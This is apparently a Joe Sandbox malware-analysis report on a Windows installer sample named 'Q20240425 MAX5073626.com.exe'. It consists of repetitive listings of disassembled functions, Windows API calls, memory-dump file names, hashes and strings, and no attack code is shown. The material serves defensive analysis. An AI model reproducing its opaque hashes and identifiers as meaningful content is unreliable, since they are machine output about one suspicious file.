                          • ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                          • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiPointerWide$Read
                          • String ID: 9
                          • API String ID: 1439708474-2366072709
                          • Opcode ID: 8dc076b5f6b3d3443fe0be4134894192265ad29a8ba19f4f5d77367b364c169f
                          • Instruction ID: 28bc79e308faf32104528e773e66d3389f01326b3cd86c4d80bcceb8b0528df4
                          • Opcode Fuzzy Hash: 8dc076b5f6b3d3443fe0be4134894192265ad29a8ba19f4f5d77367b364c169f
                          • Instruction Fuzzy Hash: F0513A71618301AFD724DF21CA44A2BB7E8BFD5704F00483FF981A62D0DBB9D9458B2A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00405728
                          • GetMessagePos.USER32 ref: 00405730
                          • ScreenToClient.USER32(?,?), ref: 0040574A
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040575E
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405786
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: b0f783585555dea67517aabca0a75eb3909d461117a357f3308b87a36fca2a36
                          • Instruction ID: 2b79068be4b60ae83c8259db87ec779734d166f8fd3edf9db49dfde3ea6d06c1
                          • Opcode Fuzzy Hash: b0f783585555dea67517aabca0a75eb3909d461117a357f3308b87a36fca2a36
                          • Instruction Fuzzy Hash: 70018C7190020DBADB00AFA4CD41FEEBBB8EF00310F10412AFA50B61D0C7B49A41CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403648
                          • MulDiv.KERNEL32(000C2089,00000064,000C2089), ref: 00403670
                          • wsprintfW.USER32 ref: 00403680
                          • SetWindowTextW.USER32(?,?), ref: 00403690
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                          Strings
                          • verifying installer: %d%%, xrefs: 0040367A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          • Opcode ID: 17b569352050f1f4470a00412e90a5bb5e3f2279c164d49800d936e6340ee145
                          • Instruction ID: 6dbe6e730449fbd92a9bf04560b44dcd6c477f830c0b6204617394cde40676b5
                          • Opcode Fuzzy Hash: 17b569352050f1f4470a00412e90a5bb5e3f2279c164d49800d936e6340ee145
                          • Instruction Fuzzy Hash: AC012870540208BBDF20AFA4DE46FAA3B69AB00305F00853EF602B51E0DBB99654CF99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                          • GlobalFree.KERNEL32(?), ref: 00402C7E
                          • GlobalFree.KERNEL32(00000000), ref: 00402C94
                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                          • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                          • String ID:
                          • API String ID: 2667972263-0
                          • Opcode ID: c2503bfcf2246e62ed797cded5ab6927b78745c5d9db6101b08a72cb335ee43e
                          • Instruction ID: 91dfb3b0b056daf98b78911dcd669c44197b27d39ed9af1c1c2aeb05edbb2529
                          • Opcode Fuzzy Hash: c2503bfcf2246e62ed797cded5ab6927b78745c5d9db6101b08a72cb335ee43e
                          • Instruction Fuzzy Hash: B931E971508351ABD310AF65CE48E1FBBE8AF89764F114A3EF591772D2C77888018B9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(Farserer248 Setup: Completed,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,Farserer248 Setup: Completed,?,?,?,?,?), ref: 00405654
                          • wsprintfW.USER32 ref: 00405661
                          • SetDlgItemTextW.USER32(?,Farserer248 Setup: Completed), ref: 00405678
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s$Farserer248 Setup: Completed
                          • API String ID: 3540041739-3134186179
                          • Opcode ID: a871fa2658700926a744169ee9911511d456feaa1e54f378fbe5ab65636dddd5
                          • Instruction ID: 46f03c1795ddbbdfa5c7e87a6366e106080ff7080865a6880c384701b222c305
                          • Opcode Fuzzy Hash: a871fa2658700926a744169ee9911511d456feaa1e54f378fbe5ab65636dddd5
                          • Instruction Fuzzy Hash: 94212B737406281BD7206A79DC40FAB729DC7C5364F01473EFD6AE31D2E9795C0985A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401F03
                          • GetClientRect.USER32(00000000,?), ref: 00401F4D
                          • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                          • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                          • DeleteObject.GDI32(00000000), ref: 00401FA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 1dc3abfa3c8bd2d0fa2c7d8d2b6549ab0233f6e4d05a49e404285e0ad6d5b50a
                          • Instruction ID: e27ace6e12ae90fa735555d6dc2d141173546c7912e56d7ac4aa5ef0030ce692
                          • Opcode Fuzzy Hash: 1dc3abfa3c8bd2d0fa2c7d8d2b6549ab0233f6e4d05a49e404285e0ad6d5b50a
                          • Instruction Fuzzy Hash: 8721B372609705AFD350DF64DD84A6BB7E8FB88304F00083EF985E62A1D678D940CB5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDC.USER32 ref: 00401FB9
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                          • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                            • Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
                          • CreateFontIndirectW.GDI32(0040C8E8), ref: 00402037
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                          • String ID:
                          • API String ID: 4253744674-0
                          • Opcode ID: 3e53c2dc1050926ecddd57de6b9722459353507f6a19a950f3088775d819a189
                          • Instruction ID: b9d691f681b1209937415237e158f82981d667971e10985866f86d4da9f8ae91
                          • Opcode Fuzzy Hash: 3e53c2dc1050926ecddd57de6b9722459353507f6a19a950f3088775d819a189
                          • Instruction Fuzzy Hash: 3001B172104740EFD300AB749E4AE5A3BE8E755306F10892DF290B31E2CA7841069B2D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CF8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406582
                          • CharPrevW.USER32(?,00000000), ref: 0040658D
                          • lstrcatW.KERNEL32(?,004082A8), ref: 0040659F
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040657C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3081826266
                          • Opcode ID: d3cf7004e435c36ab44b56149a026626ec0df863219ce38a9b644069ae6b90ca
                          • Instruction ID: c70d21cecc90bb8b859ff1a399ae67dc7ca02465e5b17997a14524cccba5a45a
                          • Opcode Fuzzy Hash: d3cf7004e435c36ab44b56149a026626ec0df863219ce38a9b644069ae6b90ca
                          • Instruction Fuzzy Hash: 0DD01731102A24AFC6015B64EE08C9B76ACAF46302301407AF581A2160DB78599287A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                          • GetTickCount.KERNEL32 ref: 00403394
                          • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                          • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: 284262d1a68705dea0d7dc2966b5c0e2100ba3629a8de97cb486b6d4ccf5c3b8
                          • Instruction ID: 66dc5bf47515c838dad350c81a9aedad462c555d1205ded2f3f13c6125eef8d2
                          • Opcode Fuzzy Hash: 284262d1a68705dea0d7dc2966b5c0e2100ba3629a8de97cb486b6d4ccf5c3b8
                          • Instruction Fuzzy Hash: 1CF0F870642301EBEB60AF60EE8DB1A3BA8B740B07F50557DA545B61E0DFB88540CB5C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00406B40: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428520,NSIS Error), ref: 00406B4D
                            • Part of subcall function 00406BEB: CharNextW.USER32(?,?,?,00000000,00425268,00406675,00425268,00425268,00000000,?,?,00406761,?,00000000,74DF3420,?), ref: 00406BFA
                            • Part of subcall function 00406BEB: CharNextW.USER32(00000000), ref: 00406BFF
                            • Part of subcall function 00406BEB: CharNextW.USER32(00000000), ref: 00406C19
                            • Part of subcall function 00406D63: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DD8
                            • Part of subcall function 00406D63: CharNextW.USER32(?,?,?,00000000), ref: 00406DE7
                            • Part of subcall function 00406D63: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DEC
                            • Part of subcall function 00406D63: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406E04
                          • lstrlenW.KERNEL32(00425268,00000000,00425268,00425268,00000000,?,?,00406761,?,00000000,74DF3420,?), ref: 004066B2
                          • GetFileAttributesW.KERNEL32(00425268,00425268), ref: 004066C3
                            • Part of subcall function 004065F5: FindFirstFileW.KERNELBASE(00000000,00426E68,00000000,004066A2,00425268), ref: 00406600
                            • Part of subcall function 004065F5: FindClose.KERNEL32(00000000), ref: 0040660C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                          • String ID: hRB
                          • API String ID: 1879705256-2849660128
                          • Opcode ID: 332689946265423fd645ed9ab5face97fdbee55fffef99fa94ae17f023b56c1f
                          • Instruction ID: beafc536108d7ba01e664b685ecdf4e5eccfaf17ad61deadd737acf53e34c435
                          • Opcode Fuzzy Hash: 332689946265423fd645ed9ab5face97fdbee55fffef99fa94ae17f023b56c1f
                          • Instruction Fuzzy Hash: 2EF0A46290477066C63127355D84A2B795C8E0636970B0E3BFC93F12D2CA3ECC72897D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405939
                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405981
                            • Part of subcall function 0040551D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: f7564aae8f1926e4a3233c1544f36dde51f1e94d371324f1fe4a4fa4b0ae707c
                          • Instruction ID: 29a3bf4303537c6dfb6488f9ea023ced7caa8441eed739618a1cdeace3b5dff5
                          • Opcode Fuzzy Hash: f7564aae8f1926e4a3233c1544f36dde51f1e94d371324f1fe4a4fa4b0ae707c
                          • Instruction Fuzzy Hash: F0017C72600508EBDF305F61EC01B9F3A2AEB40761F044437F904B62A0C7798A92AE9D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DispatchMessageW.USER32(?), ref: 00406241
                          • PeekMessageW.USER32(?,00000000,?,T5@,00000001), ref: 00406255
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Message$DispatchPeek
                          • String ID: T5@
                          • API String ID: 1770753511-1075436632
                          • Opcode ID: d8a62fb761212d4ceaa778e85a53d914b0e66df5685006e9fc385d1597838791
                          • Instruction ID: eed1a5b9d53383bb29fc144dd317486da41a8546b04d390c9037c82cb54063a4
                          • Opcode Fuzzy Hash: d8a62fb761212d4ceaa778e85a53d914b0e66df5685006e9fc385d1597838791
                          • Instruction Fuzzy Hash: C3D0127190020DB7DF10AFA4CD09F9A7B6CAF04744F00802ABB41A5090D778D1268769
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403433,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406D3C
